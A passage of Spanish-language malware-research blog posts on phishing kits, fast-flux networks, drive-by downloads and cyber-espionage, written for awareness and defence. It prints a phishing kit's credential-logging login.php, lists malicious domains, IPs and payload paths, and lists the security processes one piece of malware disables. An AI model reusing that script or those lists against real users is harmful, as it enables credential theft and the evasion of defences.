Por otro lado, esto supone un riesgo latente ya que de esta manera, cometer estafas de este estilo no se limita a poseer conocimientos avanzados en informática sino que sólo basta con que una persona sepa copiar y pegar para obtener, a medida, su sitio fraudulento en pocos minutos.

Phishing Kit In-the-Wild para clonación de sitios web Una de las estrategias más habituales para realizar ataques de Phishing se localiza en el empleo de clonaciones de sitios web; es decir, una página falsa muy similar a la real mediante la cual se busca robar información confidencial y de índole financiero de las personas a través de Internet.

129

Este Kit de Phishing propone precisamente eso. Se trata de un conjunto de páginas web de sitios conocidos listos para ser subidos a algún servidor fantasma y comenzar a diseminar, (spamear) mediante Ingeniería Social orientadas, como no puede ser de otra manera, a explotar las debilidades del eslabón más débil dentro de la cadena de seguridad: el factor humano.

Por el momento, y digo por el momento porque seguramente quienes distribuyen este kit irán ampliando la gama de clonaciones, las propuestas de ataques de Phishing son las siguientes:

AOL.com AIM.com d2jsp.org DailyMotion.com eBay.com eBuddy eGold EverQuest Forum FaceBook.com FileFront.com Gmail.com Gmail.de Habbo.de Habbohotel.com Hi5.com Hotmail ICQ.com store.apple.com Megaupload.com MetaCafe MMOCheats.com Myspace.com Nexon.net OGame.de Oxedion.de dhl.de (Packstation) PayPal.com PhotoBucket.com RapidShare.com RapidShare.de

130

Ripway.com Siteworld.de Skype.com store.steampowered.com Strato.com Usenext.com VanGuard Windows Live Yahoo.com YouTube.com

Como verán, muchas de las páginas son masivamente conocidas y ampliamente utilizadas.

Cada una de las carpetas que alojan la clonación contiene, además del index.html, un archivo de texto plano en donde se almacena la información registrada de la víctima y un login.php que contiene el siguiente código:

?php header ('Location: website'); $handle = fopen("log.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?

Donde la función header ('Location: ') contiene la información del sitio y $handle = fopen("log.txt", "a") abre el archivo de texto log.txt en modo apertura y escritura.

La mayoría de estas clonaciones se encuentran activas por lo que es necesario estar atentos al acceder a sitios web cuyos servicios sean similares.

Por otro lado, claramente se refleja que el kit fue pensado para cometer fraudes, y el hecho de encontrarse disponible en Internet lo torna aún más peligroso potenciando las probabilidades de ser potenciales víctimas de estas acciones fraudulentas.

131

Phishing Kit In-the-Wild para clonación de sitios web, versión 2 Hace unos días les contaba que se encuentra activo un paquete de phishing que contiene archivos de clonaciones de sitios web muy conocidos y masivamente utilizados por los usuarios listos para ser explotados.

Este paquete ha ampliado su "cobertura" de fraude, ofreciendo un segundo paquete con otra importante cantidad de sitios web falsos que buscan ser transparentes al usuario y obtener así su información.

El kit de Phishing mantiene la misma estrategia de diseminación que el pack anterior; es decir, un archivo index.html que es copia fiel de la página real, un login.php y un .txt , pero no así las propuestas de clonaciones para robar los datos:

Adult Friend Finder Amazon Bebo Break DeviantArt FlickR FreeWebs GeoCities LiveJournal Playstation Underground PornoTube SendSpace SourceForge Studivz Tagged Tripod - Lycos Veoh WWE Xanga XTube - Images R Broken

132

Por un lado, las estrategias que buscan obtener dinero sin mayores esfuerzos son cada vez más agresivas y más invasivas; y por el otro, la mayoría de estos kits se encuentran disponibles en Internet de manera gratuita o mediante el pago, en este caso, de una cantidad de dinero no tan alta como sucede con pack similares.

Los ataques de phishing son cada vez más peligrosos porque sus creadores buscan eficacia en el desarrollo del mismo para que la copia sea lo más fiel posible a la real. Esto supone un potencial riesgo que, asociado a la combinación con técnicas intrusivas como los kit de malware (ElFiesta , MPack , IcePack , etc.) que se implantan en servidores fantasmas o vulnerados para diseminar el phishing, se torna cada vez más peligroso para quienes desconocen, incluso para quienes conocen también, el funcionamiento de estas técnicas de ataque.

Creación Online de malware polimórfico basado en PoisonIvy Evidentemente, los creadores y propagadores de códigos maliciosos han encontrado en este modo de vida un carácter rentable que los mantiene día a día enfocados en crear nuevas alternativas que les permita ganar “dinero extra” por intermedio de programas dañinos donde el tiempo, costo y beneficio parecen ser los atributos que buscan en sus aplicativos.

133

Sumado a que Internet hoy por hoy constituye también un medio hostil, cuando no es utilizado teniendo en cuenta los recaudos mínimos y necesarios en materia de seguridad, es aprovechado como plataforma para cometer diversos tipos de ataques y, como en este caso, ofrecer variados “servicios”, entre ellos, la creación de códigos maliciosos.

Se trata de la versión Online de PoisonIvy llamado PoisonIvy Polymorphic Online Builder , un conocido troyano dentro del mundo del malware que respeta la clásica creación de códigos dañinos permitiendo generar un troyano (servidor) que se disemina para infectar equipos y luego controlar esos equipos infectados a través del programa cliente.

Sin embargo, esta versión en línea posee un componente extra que torna el resultado en un malware mucho más peligroso que el creado de manera convencional: agrega características polimórficas. Esto significa que cada binario creado por intermedio de este “servicio automático” será diferente porque cambia completamente su código.

Esta característica busca evadir la detección por parte de firmas antivirus y prolongar así su ciclo de vida, lo que supone que, cuanto menos AV lo detecten más dinero genera su creador.

Este paquete se encuentra escrito en PHP/ASM y si bien la creación de malware se realiza en línea, no es libre, se comercializa al precio de USD 500. En la captura podemos observar sus características:

Esta situación no es más que otra de las tantas evidencia que ponen en manifiesto que el malware es un negocio, toda una industria donde cada vez son más los desarrolladores que se suman a sus filas.

Entendiendo las redes Fast-Flux Las redes Fast-Flux constituyen una metodología avanzada en la propagación de amenazas que actualmente es explotada de manera activa para infectar equipos, entre tantos otros delitos. El objetivo es ocultar las actividades maliciosas a través de direcciones IP que van rotando en cuestión de segundos contra un mismo dominio, lo que impide localizarlas para poder bloquearlas al dificultar su identificación.

Cada una de estas direcciones IP, que se van asignando a los dominios, corresponden a máquinas que previamente han sido comprometidas con algún código malicioso, formando parte de una botnet, y trabajan a modo de "puente" entre el equipo que solicita determinado recurso y el servidor que aloja ese recurso. Esta metodología de operación de la red recibe el nombre de Single-Flux (flujo único).

Es decir, en un proceso normal, un equipo cliente realiza una petición (GET) al servidor quien luego responde al cliente ofreciendo el resultado; en redes single-flux, la petición original realizada por el cliente no rebota contra el servidor sino que lo hace contra la máquina zombi, y es esta quien realiza la consulta al servidor.

134

Existe otra metodología denominada Double-Flux (doble flujo) en el que, además de contemplar las características de single-flux, explota la resolución de nombres y los servicios de registro de nombres de dominio.

A través de una simple consulta DNS contra un dominio es posible establecer si esta forma parte de una red Fast-Flux. En el siguiente ejemplo donde se observa las diferentes direcciones IP que se establecen al dominio www.lijg.ru .

;; QUESTION SECTION: ;www.lijg.ru. IN A

;; ANSWER SECTION: www.lijg.ru. 600 IN A 24.107.209.119 www.lijg.ru. 600 IN A 24.219.191.246 www.lijg.ru. 600 IN A 65.65.208.223 www.lijg.ru. 600 IN A 65.102.56.213 www.lijg.ru. 600 IN A 67.141.208.227 www.lijg.ru. 600 IN A 69.14.27.151 www.lijg.ru. 600 IN A 70.251.45.186 www.lijg.ru. 600 IN A 71.12.89.105 www.lijg.ru. 600 IN A 71.235.251.99 www.lijg.ru. 600 IN A 75.11.10.101 www.lijg.ru. 600 IN A 75.75.104.133 www.lijg.ru. 600 IN A 97.104.40.246 www.lijg.ru. 600 IN A 173.16.99.131

;; AUTHORITY SECTION: lijg.ru. 345600 IN NS ns5.lijg.ru. lijg.ru. 345600 IN NS ns1.lijg.ru. lijg.ru. 345600 IN NS ns2.lijg.ru. lijg.ru. 345600 IN NS ns3.lijg.ru. lijg.ru. 345600 IN NS ns4.lijg.ru.

135

Por otro lado, dicen que una imagen vale más que mil palabras así que... veamos que nos dice la siguiente, obtenida de SecViz y realizada por Jaime Blasco:

La representación de redes Fast-Flux a través de herramientas gráficas es una excelente alternativa ya que permite, a través de una sola vista, conocer desde el punto de vista estructural y de manera muy atractiva cómo se compone dicha red.

En este ejemplo, el gráfico muestra una serie de dominios Fast-Flux (color azul) y cada una de las zombies PC’s que lo conforman (color rojo). Al realizarse la triangulación de cada uno de los dominios infectados, notamos que algunos pertenecen a varias redes FF dentro de una misma estructura de red.

Esto supone mayor ventaja para el atacante ya que dispone de un abanico mucho más extenso de equipos comprometidos que son utilizados de manera distribuida para diseminar mayor cantidad de malware, propagar mayor cantidad de spam, realizar mayor cantidad de ataques de phishing, y muchas otras actividades maliciosas y fraudulentas.

136

Explotación masiva de vulnerabilidades a través de servidores fantasmas La cantidad de dominios chinos que día a día son utilizados para explotar vulnerabilidades en los equipos de las personas que acceden a las páginas web concebidas con fines maliciosos, es realmente importante.

Estos servidores alojan páginas que contienen exploits para diferentes debilidades de sistemas operativos Microsoft Windows y algunas otras aplicaciones. Actualmente están siendo utilizados de manera masiva para la propagación de códigos maliciosos.

Según ThreatExpert, China junto a Rusia conforman los dos países con mayor tasa de propagación de amenazas.

Los dominios que se exponen a continuación forman parte de granjas alojadas en servidores fantasmas y muchos de ellos se encuentran activos, por lo que se sugiere ser cautelosos si se desea acceder a los mismos. La finalidad de dar a conocer estos dominios es netamente investigativa e informativa, y considerado útil para el bloqueo de las URLs maliciosas.

*.705sese cn (59.34.197.15) contiene exploits para MS06- 014 , MS08-067 , StormPlayer , RealPlayer que ejecuta desde /a2/fxx.htm y descarga el binario al.css que explota puntualmente la vulnerabilidad en MS08-067 .

*.d.bc-s350 cn (58.253.68.65) descarga el binario gr.exe (MD5: abd5bcb105dd982ae0b9c1f8c66bc07c – virus total report 33/39). *.yandex2 cn (193.138.172.5) descarga el binario load.exe (MD5: 2ce6d3c0f526f96b32db8cef06921ffc – virus total report 23/39) desde /load.php?id=21&spl=5 . *.metago cn (193.138.172.5) *.copy-past cn (195.242.161.24) contiene exploit. *.whitebiz cn (91.211.64.155) descarga un binario llamado load.exe (MD5: d7d03b7ea57ecaf008350a4215f8e2bc- virus total report 12/39) desde /service/load.php .

*.winesamile cn *.bigsellstaff cn *.cntotalizator cn *.fiesta-tests com *.fresh-best-movies cn *.helinking cn *.ns2.oxdnski cn *.onlinestat cn *.trafiks cn *.783456788839 cn (195.190.13.106) descarga troyano desde /load.php?spl=zango1 . *.234273849543 cn *.384756783900 cn *.109438129432 cn 137

*.sinakis cn (91.211.64.89) descarga malware desde /baner/load.php?id=187&spl=4 *.nohtingherez cn (217.20.112.96) descarga el binario adv111.exe (MD5: 4adc9c50005c301db9af13f8467801f7 - virus total report 14/37). *.o6ls cn (91.203.4.137) descarga malware desde /load.php?id=3459&spl=4 .

Análisis esquemático de un ataque de malware basado en web Internet se ha transformado en una aliada plataforma de ataque para los creadores de malware, donde técnicas como Drive-by-Download , scripting , exploit , y la combinación de ellos, son cada vez más comunes y ejecutan su carga dañina directamente en el sistema víctima, de manera casi instantánea y transparente a la vista del usuario menos experimentado, convirtiéndose en un peligro latente por el simple acto de acceder a un sitio web.

Un ejemplo concreto lo constituye el siguiente ataque mediante el cual se recurre a diferentes componentes para explotar e infectar el sistema víctima que, aunque ya comunes en estos días, poseen varias características extras que potencian su daño.

Al acceder a la página maliciosa, un script ejecuta de manera transparente varios iframes y un exploit para la vulnerabilidad solucionada y explicada en el boletín MS08-067. Actualmente, esta vulnerabilidad se encuentra activamente explotada por el gusano Downadup/Conficker con una tasa de infección muy alta.

El archivo sina.css no es lo que parecería ser (una hoja de estilo encascada), sino que se trata de un archivo ejecutable que es el encargado de ejecutar el exploit para la vulnerabilidad mencionada, inyectando código dañino en los procesos winlogon.exe , explorer.exe y services.exe . Realiza una copia de si mismo en C:\DOCUME~1\user\LOCALS~1\Temp\ bajo el nombre svchost.exe creando su proceso asociado. Además, también crea el archivo Beep.sys en C:\WINDOWS\system32\drivers\ ejecutándolo como servicio y ocultándose del sistema operativo con capacidades de rootkit.

Al mismo tiempo, manipula el registro del sistema para evitar la ejecución de las siguientes procesos correspondientes a herramientas de seguridad:

RStray.exe, ProcessSafe.exe, DrvAnti.exe, safeboxTray.exe, 360tray.exe, 360safebox.exe, 360Safe.exe, 360rpt.exe, adam.exe, AgentSvr.exe, AntiArp.exe, AppSvc32.exe, arswp.exe, AST.exe, autoruns.exe, avconsol.exe, avgrssvc.exe, AvMonitor.exe, avp.com, avp.exe, CCenter.exe, ccSvcHst.exe, EGHOST.exe, FileDsty.exe, filemon.exe, FTCleanerShell.exe, FYFireWall.exe, GFRing3.exe, GFUpd.exe, HijackThis.exe, IceSword.exe, iparmo.exe, Iparmor.exe, isPwdSvc.exe, kabaload.exe, KASMain.exe, KASTask.exe, KAV32.exe, KAVDX.exe, KAVPF.exe, KAVPFW.exe, KAVSetup.exe, KAVStart.exe, KISLnchr.exe, KMailMon.exe, KMFilter.exe, KPFW32.exe, KPFW32X.exe, KPfwSvc.exe, Kregex.exe, KRepair.com, KsLoader.exe, KvDetect.exe, KvfwMcl.exe, kvol.exe, kvolself.exe, KVSrvXP.exe, kvupload.exe, kvwsc.exe, KvXP.kxp, KWatch.exe, KWatch9x.exe, KWatchX.exe, MagicSet.exe, mcconsol.exe, mmqczj.exe, mmsk.exe, Navapsvc.exe, Navapw32.exe, NAVSetup.exe, nod32.exe, nod32krn.exe, nod32kui.exe, 138

NPFMntor.exe, PFW.exe, PFWLiveUpdate.exe, procexp.exe, QHSET.exe, QQDoctor.exe, QQDoctorMain.exe, QQKav.exe, Ras.exe, Rav.exe, RavMon.exe, RavMonD.exe, RavStub.exe, RavTask.exe, RawCopy.exe, RegClean.exe, regmon.exe, RegTool.exe, rfwcfg.exe, rfwmain.exe, rfwProxy.exe, rfwsrv.exe, rfwstub.exe, RsAgent.exe, Rsaupd.exe, rstrui.exe, runiep.exe, safelive.exe, scan32.exe, SelfUpdate.exe, shcfg32.exe, SmartUp.exe, SREng.exe, SuperKiller.exe, symlcsvc.exe, SysSafe.exe, taskmgr.exe, TrojanDetector.exe, Trojanwall.exe, TrojDie.exe, UIHost.exe, UmxAgent.exe, UmxAttachment.exe, UmxCfg.exe, UmxFwHlp.exe.

Otras de las acciones dañinas de este malware realizadas en el registro, es la eliminación de las subclaves contenidas en HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ y HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ para evitar el arranque del sistema en modo seguro (MPF).

Por otro lado, establece una conexión con la IP 60.161.34.251 , correspondiente al dominio hfdy2929 com (alojada en Beijing, China - Chinanet Yunnan Province Network), y realiza una consulta DNS.

También establece conexión con 9 99.hfdy2828 com , también alojada en China (Chongqing Chinanet Chongqing Province Network), a través del protocolo http en el puerto por defecto.

Al establecer esta conexión, consulta el archivo bak.txt que contiene un listado de malware a descargar. Un total de 35 archivos ejecutables que corresponden a los siguientes códigos maliciosos:

• Win32/TrojanDropper.Agent.NPO • Win32/PSW.Legendmir.NGG • Win32/PSW.OnLineGames.NRD • Win32/PSW.OnLineGames.NRF • Win32/PSW.OnLineGames.NTM • Win32/PSW.OnLineGames.NTN • Win32/PSW.OnLineGames.NTP • Win32/PSW.WOW.DZI

La nomenclatura utilizada en el nombre de cada malware corresponde a la establecida por el motor de firmas de ESET NOD32 Antivirus 3.0.672.0.

En el código principal (primera imagen), existen varias etiquetas iframe que mantienen la misma metodología explicada, verificando en el equipo víctima la existencia de vulnerabilidades.

• http://sss.2010wyt net/ac html : descarga el archivo css.css desde http://xxx.2009wyt com . Es copia de sina.css y explota la vulnerabilidad MS08-067. 139

• http://sss.2010wyt net/614 js : descarga el archivo bak.css desde http://xxx.2009wyt net . Es copia de sina.css . Explota las vulnerabilidades MS08-067 y MS06-014. • http://sss.2010wyt net/r js , http://sss.2010wyt net/r html , http://sss.2010wyt net/fzl htm y http://sss.2010wyt net/asd htm : descargan los archivos versionie.swf y versionff.swf desde http://sss.2010wyt net . Ambos explotan una vulnerabilidad en Flash Player.

Sin embargo, no todo termina aquí mismo, sino que aparece otro dominio desde el cual se descargan algunos de los códigos maliciosos mencionados líneas arriba y cuya referencia se encuentra en el archivo bak.txt , la relación de este dominio con otros es la siguiente:

Los ataques de malware se han vuelto más sofisticados debido a la combinación de diferentes tecnologías con diferentes metodologías maliciosas que intentan cumplir con sus fines de cualquier manera.

Lo que se expone en este texto no es otra cosa que el claro reflejo de lo que sucede, o puede suceder, cuando accedemos a sitios vulnerados para diseminar malware, o creados íntegramente con estos fines; y de las capacidades dañinas que cada día son más habituales en los códigos maliciosos.

Anatomía del exploit MS08-078 by FireEye Luego de darme una vuelta por un conocido foro de seguridad e intentar colaborar con el tópico que se refiere al problema ocasionado por el gusano conficker que se propaga a través de una vulnerabilidad solucionada en el boletín MS08-067, que como ustedes saben, son poco los programas antivirus que eliminan la amenaza de manera efectiva.

Me colgué leyendo un artículo de la empresa FireEye que trata sobre otra vulnerabilidad, muy conocida y solucionada en boletín MS08-078, activamente explotada por alguna familia de gusanos y troyanos, por lo que me gustaría compartir las apreciaciones que surgen de lo escrito por esta empresa en su blog.

Lo que se plantea en primera instancia, es la incógnita de saber qué sucede en el navegador web cuando un usuario accede a una página que contiene el exploit para esta vulnerabilidad. 140

En la URL que se tomó como ejemplo, se ve el empleo de ofuscación como método para evitar la detección del script malicioso, escrito en JavaScript, que se encuentra incrustado en el código.

En JavaScript presenta dos segmentos separados y bien diferenciados de los cuales, el primero de ellos muestra un VBScript sin codificar:

Mientras que el segundo, posee nuevamente una codificación que busca dejar ilegible el código real:

Pero en definitiva, cuál es la carga útil de este tipo de script, es decir, qué sucede en el preciso momento que el exploit detecta la vulnerabilidad. Básicamente, el exploit se encarga de descargar y ejecutar un código malicioso en el equipo víctima.

Pero antes de ejecutarlo, se realiza dos copias de sí mismo, una en la carpeta C:\WINDOWS (quit.exe) y la otra en los temporales del usuario local (svchoost.exe). 141

Ejecutándose luego, en primera instancia, manera automática el binario svchoost.exe.

Luego, el archivo svchoost.exe se auto-elimina y se establece una conexión a través del puerto 53 para descarga otros archivos maliciosos (200512.exe).

Entre el malware que descarga a posterior se encuentran, un keylogger, un backdoor y un malware creado para robar contraseñas de juegos en línea.

Además, crea la clave necesaria en el registro que le permite ejecutarse cada vez que inicia el sistema operativo.

Como verán, las acciones que realiza este malware son bastantes complejas en su conjunto, captura las pulsaciones del teclado, roba contraseñas, abre puertas traseras y convierte al equipo en parte de una botnet. Todo se lleva a cabo de manera casi instantánea y de manera transparente para el usuario. 142

La URL que se utilizó para describir el exploit todavía se encuentra activa. Pueden ver el reporte de VirusTotal que muestra el estado de detección del malware hasta el momento.

Estas técnicas son muy utilizadas por el malware para explotar vulnerabilidades vía web. Muchos son los casos que se pueden nombrar que utilizan Drive-by-Download para infectar a los usuarios cuyo sistema posee la vulnerabilidad, nada más ni nada menos, con el sólo hecho de acceder a la página con contenido malicioso.

143

- Inteligencia en la lucha contra el crimeware - 144

Campaña de desinformación para propagar malware La desinformación consiste básicamente en falsear o manipular la información de manera tal que quien la recibe termine creyendo en algo completamente falso, y de lo cual el originador obtiene alguna ventaja. Por ejemplo, el rumor es una herramienta empleada en las campañas de desinformación. A su vez, la desinformación es una herramienta que permite obtener información útil en tiempo y forma (Inteligencia).

Trasladado este concepto al ámbito informático, no es ni más ni menos que una metodología de Ingeniería Social que cada vez más utilizan los desarrolladores de códigos maliciosos para intentar atraer la confianza de los usuarios y aprovecharse así de esa condición para ejecutar el proceso de infección.

Habitualmente lo vemos en las páginas que diseminan malware del tipo scareware (también conocido como rogue ), donde encontramos imágenes de certificaciones como Virus Bulletin o AV-Comparatives, o algunas otras como PC Magazine o PC World que si bien no cumplen la misma función que las anteriormente ya que son revistas conocidas que gozan de "confianza" entre el público.

Otra alternativa centra sus esfuerzos en tratar de demostrar que esa "solución" ( scareware ) es la mejor. Esto se hace a través de falsas comparativas donde se pone en tela de juicio los niveles de detección de compañías antivirus ampliamente conocidas en el mercado.

Ambas estrategias de engaño apelan a lo que se conoce bajo el concepto de autoridad que representan estas certificaciones y publicaciones en el campo "real" de la seguridad antivirus y de la tecnología informática respectivamente.

En este sentido, recientemente he detectado otra metodología de engaño que también se encuentra orientada a emitir desinformación con el objetivo de incentivar a los usuarios a creer en la información y actuar en consecuencia.

Se trata de simular que el archivo ofrecido se encuentra libre de códigos maliciosos, apelando también a la autoridad, pero en este caso, de organizaciones que permiten verificar la integridad de los archivos a través de un proceso online que somete los archivos a las soluciones antivirus con mayor confianza en el mercado. Por ejemplo, servicios como VirusTotal o VirScan. A continuación vemos una de las capturas.

Los dominios involucrados se encuentran alojados en la IP 213.5.64.20 , ubicada en los Países Bajos ( Netherlands Altushost Inc ) en pero no todos diseminan la amenaza.

Entre ellos: 145 safehostingsolutions.com/download.html fileaddiction.com/download.html freedatatransfer.com/download.html freedownloadthanks.com/download.html megasecuredownload.com/download.html qualityupload.com/download.html

Los archivos que se descargan tienen los siguientes nombres:

• Hpack Generator.exe (91b31ea8c551397cd5b1d38ec1aa98dd) - Result: 8/40 (20.00%) • UAV Generator.exe – Idem • Knight Generator.exe – Idem • LG Generator.exe – Idem • Kings Generator.exe – Idem • DBlocks Generator.exe – (53e3256bef0352caf794b641f93a32d5) - Result: 6/40 (15%)

Como podemos notar, que además de la nueva propuesta de engaño que a pesar de ser bastante trivial cuenta con un alto impacto de efectividad, el nivel de detección en los dos códigos maliciosos es muy bajo; representando sólo entre el 15% y 25% de 41 motores antivirus.

No es para alarmarse pero sí para estar atentos.

Espionaje informático a través de malware Durante este mes recuerdo haber desayunado con una noticia que para muchos medios de información parecería ser novedoso o exclusivamente ligado con algunas películas de Hollywood, dándole una connotación de "sorprendente". Me refiero al espionaje a través de medios informáticos.

A continuación dejo una captura de esa noticia, en la cual se deja en evidencia que los códigos maliciosos también forman parte de las operaciones de Inteligencia en diferentes contextos, tanto desde un punto de vista netamente fraudulento (en el caso de los delincuentes informáticos) como en el que se escuda bajo la "bandera" de proteger y resguardar los intereses de un Estado (el caso de muchos servicios de Inteligencia), que buscan sacar ventajas y/o neutralizar las potenciales acciones encuadradas dentro de su marco de hostilidad.

Incluso, en muchos casos, rozando la legalidad de las acciones.

Según la información que se manifiesta en el artículo, el servicio de Inteligencia más importante de Israel (Mossad ) ha utilizado un código malicioso del tipo troyano para obtener información confidencial y critica sobre instalaciones nucleares en Siria.

El hecho de que el Mossad utilizara un programa para hacer espionaje tampoco es una novedad ya que, al igual que su equivalente estadounidense ( CIA) y muchos otros, antiguamente ha utilizado Promis como recurso de espionaje .

146

(Algún día quizás me anime a escribir algo sobre los programas utilizados por los servicios de Inteligencia de todo el mundo ;P)

La cuestión es que independientemente de la repercusión de la noticia, los códigos maliciosos son sin lugar a dudas uno de los programas más empleados para la obtención de información, también a nivel gubernamental y militar; incluso, entre compañías que buscan obtener datos confidenciales que permitan revelar las actividades de su competencia y ganar ventajas.

Ahora, cualquier organización o ente gubernamental puede ser víctima del espionaje informático, y estas actividades también deben ser atendidas por Seguridad de la Información . Entonces, qué se puede hacer para contrarrestar o neutralizar estas actividades, que en la mayoría de los casos se manejan al borde de lo ilegal, la verdad es que no es nada fácil. Sin embargo, aplicar una estrategia de desinformación puede ser una buena práctica de contraespionaje .

En definitiva es fácil deducir que este tipo de maniobras no son sólo acciones catalogadas como "fantasmas" o dentro del género "ciencia ficción" propias de las películas, sino que cotidianamente somos potenciales víctimas de los intentos persistentes de los desarrolladores de malware que buscan romper nuestros esquemas de seguridad para obtener información secreta.

CYBINT en el negocio de los ciber-delincuentes rusos Quienes siguen esporádicamente este blog habrán notado que casi todo este año he dedicado la mayoría de los post a poner en evidencia muchas de las aplicaciones que desde Rusia inundan un mercado clandestino donde crimeware de todo tipo se pone a disposición de ciber-delincuentes profesionales ( botmasters , spammers , phishers , ¿ ciber-sicarios ?, ¿ciber-terroristas ?, entre otros) pero sin descuidar a los aspirantes que buscan convertirse en delincuentes de alto rango.

En este sentido, el tiempo nos permite ser testigos de cómo se gesta esta industria clandestina alimentada fuertemente por países de Europa del Este (particularmente Rusia), China, y algunos países latinoamericanos encabezados por Brasil. Sin embargo, el caudal y la atención se centran en Rusia, y como dije en alguna oportunidad, me recuerda al mundo que describe Gibson en Neuromante, donde la comercialización clandestina de programas maliciosos se desarrolla en calles oscuras del suburbio.

Quizás, al igual que yo lo hice en algún momento, muchos se preguntarán, independientemente del tipo de crimeware que se oferte o de las motivaciones (la principal tiene un acrónimo: USD ) de los ciber-delincuentes, ¿quiénes se encuentran detrás de esto?

Si tenemos en cuenta que la venta de programas se realiza en torno a un negocio oscuro que forma parte de una industria que opera desde la clandestinidad ( RBN - Russian Business Network – Red de Negocios de Rusia), que existen células bien organizadas que llevan a cabo fraudes a través de Internet (p.e. scammers rusas), espionaje empresarial (contratando piratas informáticos), entre otras cosas, es fácil deducir que todo tiene una connotación mafiosa. Y si profundizamos más en torno al origen de la mafia rusa, concluiremos fácilmente en que fue gestada por ex agentes de la KGB (Inteligencia de la ex Unión Soviética).

De hecho, se estima que esta red criminal cuenta con ex agentes de lo que fue la KBG y que actualmente, en más de una oportunidad, ha trabajado en conjunto con la FSB ( Federal Security Service of the Russian Federation ), el sucesor de la KGB.

¿Qué quiero decir con esto? Aunque quizás lo que escribo puede parecer extremo, nos encontramos en tiempos en los cuales somos testigos de los conflictos virtuales que involucran a ciertos países. Esos ataques informáticos que vemos en las películas de Hollywood, un poco exagerados, en los últimos años han dejado la ficción para entrar en la escena del mundo real, 147 y en este sentido, CYBINT ( Cyber Intelligence ) juega un rol fundamental.

Por ejemplo, cada vez son más los casos de defacement que, si bien no es algo nuevo, hacen noticia cuando se afecta la disponibilidad de los sitios web de los gobiernos que forman el centro de la ciber-guerra ( Cyber-Warfare ) de turno. Los ataques de DDoS (Distributed Denial Of Service ), que se llevan a cabo a través de botnets , como el que sufrió el sitio web del presidente de Georgia durante el conflicto con Rusia, que de hecho los rusos se cargaron un par más (Estonia y Lituania), son claros ejemplos de acciones que buscan complementar las operaciones a nivel militar.

Lo llamativo de casos como los mencionados en el párrafo anterior, dejan en completa evidencia que existe una planificación previa, de forma coordinada; lo que no es otra cosa que un plan de inteligencia. En el caso de los defacement, aunque parezca trivial, podríamos decir que dentro del conflicto, forma parte de acciones psicológicas que buscan debilitar la moral del bando contrario.

Sin embargo, otros aspectos menos triviales también forman parte de los planes de inteligencia, y generalmente se explotan a través de recursos tecnológicos, p.e. atacar la disponibilidad de las redes telefónicas ( COMINT ), la interrupción de señales atacando satélites y otras redes (SIGINT ), incluyendo las de carácter público, afectando la confidencialidad de las personas a través de malware. Bajo toda esta escenografía, la RBN, una de las organizaciones ciber-criminales más grandes que opera bajo la infraestructura que ofrece Internet, es la base que permite cometer, desde Rusia (aunque hay un fuerte rumor en torno a que la RBN está migrando sus actividades hacia China), infinidad de acciones maliciosas canalizadas en pedofilia, pornografía, comercialización de crimeware, malware, phishing, botnets, y muchas más.

Esto demuestra que realmente los aspectos que involucra el ciber-crimen se encuentran controlados y dirigidos por una mafia en la cual, los ciber-delincuentes rusos conforman una de las piezas más importantes para el desarrollo de la industria crimeware a nivel global, y como podemos apreciar… Todo vale y todo se fusiona con todo…

148

Inteligencia informática, Seguridad de la Información y Ciber-Guerra Sin lugar a dudas, cada vez somos más dependientes de la tecnología y las redes computacionales, no solo a nivel hogareño, sino que también en niveles mucho más altos como lo son los empresariales y gubernamentales donde la necesidad de obtener y preservar la información se tornan acciones relevantes.

Bajo este escenario, se generan nuevos desafíos y nuevas estrategias para abordar esos desafíos que, al mismo tiempo, marcan las reglas de un juego donde los recursos tecnológicos, la información y los procesos de inteligencia son las piezas fundamentales para asegurar la continuidad de los negocios (en materia comercial) y la operatividad de proyectos gubernamentales/militares en cualquiera de sus niveles.

Por un lado, porque los ambientes empresariales invierten dinero en nuevas y mejores tecnologías que permitan garantizar la persistencia de sus negocios y evitar que su información llegue a manos de la competencia, cuidándola celosamente a través de esquemas de seguridad que buscan frenar el accionar de sicarios informáticos que a menudo se contratan para realizar espionaje .

Por el otro, los Estados también invierten en tecnologías a través de sus servicios de inteligencia (estatales y militares) dando origen a nuevas formas de obtener información de manera oportuna bajo el empleo de recursos técnicos y diferentes fuentes de información; canalizando así una gran competencia que intenta constantemente avanzar sobre sus enemigos para apoderarse de la información que delate los planes (geopolíticos, militares y económicos) de otras naciones.

Esto hace que inevitablemente, desde un punto de vista particular, quienes nos dedicamos a seguridad de la información debamos canalizar parte de los esfuerzos en agregar al estado del arte ciertas actividades y metodologías que antiguamente sólo se adjudicaban a los servicios de inteligencia.

En este sentido, las iniciativas gubernamentales por proteger sus perímetros tecnológicos reciben especial atención por parte de diferentes Estados que se encuentran involucrados en una guerra que se gesta en un escenario que muchos pueden considerar nuevo, pero que sin embargo no lo es: el virtual, y cuyas estrategias de “combate” se llevan a cabo a puertas cerradas empleando algo tan común en la actualidad como lo es Internet.

Estos combates, no se basan en asesinatos en masa como en una guerra convencional, sino que se basan en aspectos informáticos y tecnológicos. En consecuencia, quienes mejor tecnologías desarrollen y mejor la apliquen, gozaran de la capacidad para obtener mayor y mejor nivel de información. Esta forma de lucha no convencional y a gran escala recibe el nombre de Cyber-Warfare , o según su traducción al español, Ciber-Guerra .

¿De qué estamos hablando? Se trata de la utilización de medios informáticos para llevar a cabo una guerra a través de Internet. Bajo esta perspectiva, se torna necesario recurrir a Inteligencia Informática ( CYBINT - Cyber Intelligence ).

Desde una perspectiva amplia, la Cyber-Warfare no es diferente a lo que realizan los especialistas en Seguridad de la Información al tratar de diseñar estrategias defensivas, y ofensivas, destinadas a la salvaguarda y protección de la información, ya sea a nivel gubernamental o privado.

¿Podemos decir entonces que quienes nos dedicamos a esto somos soldados de una guerra virtual que se desarrolla a nivel mundial? Yo diría que indirectamente sí. Que formamos parte de una gran guerra virtual que se alimenta de otras más chicas y particulares.

149

Desde la existencia misma de los servicios de inteligencia, la información pasó a ser el botín de guerra y, al mismo tiempo, el alimento con el que día a día se nutren independientemente de los métodos y mecanismos que se utilicen para su obtención. Entonces es evidentemente la razón por la cual se diseñan mecanismos que permitan obtenerla en tiempo y forma.

